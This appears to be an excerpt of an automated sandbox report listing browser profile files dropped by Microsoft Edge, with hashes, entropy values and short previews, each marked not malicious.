                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):271
                                                                                                            Entropy (8bit):5.250752464455383
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Y1PT1N723fQdaVdg2KLla12Q+q2PN723fQdaPrqIFUv:YRaOLQ0VvVal3FUv
                                                                                                            MD5:6B29B98E8C97FD5774001D5EED15B981
                                                                                                            SHA1:AC206804BB0C8B4F12DCFD3B2E7A18FAC4665ACB
                                                                                                            SHA-256:9C18EF860B14A14707744F5457524F985265CED3DECEC157A86A3D51F9C95F0B
                                                                                                            SHA-512:F2E0D2EC6C46022A0C55AE1F8DD54A0832EDA10FF0C6E7EBA193BD1DB4F808ABC92A2A36487A52288500332C5B179B61020EC83BA9C6A0B718C873E28306C218
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:46.128 1b28 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Extension Rules since it was missing..2024/12/05-04:39:46.162 1b28 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Extension Rules/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):171
                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                            MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                            SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                            SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                            SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                            Malicious:false
                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):275
                                                                                                            Entropy (8bit):5.267890807902402
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Y1f1N723fQd6FB2KLla1HQQ+q2PN723fQd65IFUv:YBatFFLQ2VvVatWFUv
                                                                                                            MD5:4DF6D1F10103A1282A7F5A5019449B76
                                                                                                            SHA1:455877F7FFD7A67AC111E04081ADB2D38572B5BF
                                                                                                            SHA-256:D506BD7F19CD0D8E71FAF34C13F41AE71FE4052FB983E9A4DF934DF6B338D589
                                                                                                            SHA-512:52A4A8935B94AAAAC5893A6E0E167DD37B3ED8C4B06BD72A66AD6028CF140BA3AC28438497E97CA8A88C11FE3094A6A76136AA3EDED05D402324EDCC58CE26B5
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:46.177 1b28 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Extension Scripts since it was missing..2024/12/05-04:39:46.339 1b28 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Extension Scripts/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.6975083372685086
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
                                                                                                            MD5:F5BBD8449A9C3AB28AC2DE45E9059B01
                                                                                                            SHA1:C569D730853C33234AF2402E69C19E0C057EC165
                                                                                                            SHA-256:825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
                                                                                                            SHA-512:96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                            Malicious:false
                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):270336
                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):262512
                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:LsNlxJLllll:Ls3fLllll
                                                                                                            MD5:EF1914E0F750C5627A256B4E00254407
                                                                                                            SHA1:19CC17742B1E580C4ABC9835D72B3210E5B7BA6C
                                                                                                            SHA-256:241CEBFB48036643C2B5440D799C957D9134C50702F2B5873E03AD0381B1F6D2
                                                                                                            SHA-512:3EAED9E30BF92E6885F6E8F179D9269873626C6360C9B262280B7EE94B8884507C60C59639260D41E8175D3584AD248A382C87D48A86D223BC893C8ABEB64625
                                                                                                            Malicious:false
                                                                                                            Preview:........................................)eJ.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):155648
                                                                                                            Entropy (8bit):0.5407252242845243
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):0.33890226319329847
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                            MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                            SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                            SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                            SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):281
                                                                                                            Entropy (8bit):5.254354856613532
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:YEDB1N723fQha2jM8B2KLlaCyfq2PN723fQha2jMGIFUv:YEdaujFLQnfvVauEFUv
                                                                                                            MD5:4EC9CD2DF73959516AA397BCB82EEB80
                                                                                                            SHA1:BA5DC2C3571BAEBE9A1B300732AA84DFDF498A91
                                                                                                            SHA-256:CFCC9502B79FCF2701B989746DA1356947D217108029A569BF146B245854E194
                                                                                                            SHA-512:5EA81A3E216DA5E8DD679D92A18A8DBC95A49A1F08A470147DB4434413CE395E3BB4A115C90A969ACB7191437531D1FA842A9FB5A09EFBFF97D5F67BBF11492C
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:47.263 cb0 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Local Storage\leveldb since it was missing..2024/12/05-04:39:47.441 cb0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Local Storage\leveldb/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):51200
                                                                                                            Entropy (8bit):0.8745933985004888
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:y8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:y8yLG7IwRWf4
                                                                                                            MD5:7A9BF0D6AB6967E057DB6BA4EE45243B
                                                                                                            SHA1:0C8775DE3A37242BA7CF2FAE40613E935970928F
                                                                                                            SHA-256:E3C8C78A681C3CB37BE10D4B3D9E97E05D438DCF71FBF9CE4F388A3F3218BE8F
                                                                                                            SHA-512:42BCF1D8588E89E9DE413A4AE5C973D5F149F09273CB293EDF53AB2EF94D493310F19F10CA06EBDF6893CB46AA234A5BAA1C4CD1D531F26C1B406B7AE459EEDA
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):59
                                                                                                            Entropy (8bit):4.619434150836742
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                                                            MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                                                            SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                                                            SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                                                            SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                                                            Malicious:false
                                                                                                            Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:H:H
                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                            Malicious:false
                                                                                                            Preview:[]
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.6732424250451717
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):59
                                                                                                            Entropy (8bit):4.619434150836742
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                                                            MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                                                            SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                                                            SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                                                            SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                                                            Malicious:false
                                                                                                            Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:H:H
                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                            Malicious:false
                                                                                                            Preview:[]
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:H:H
                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                            Malicious:false
                                                                                                            Preview:[]
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40
                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                            Malicious:false
                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):36864
                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2
                                                                                                            Entropy (8bit):1.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:H:H
                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
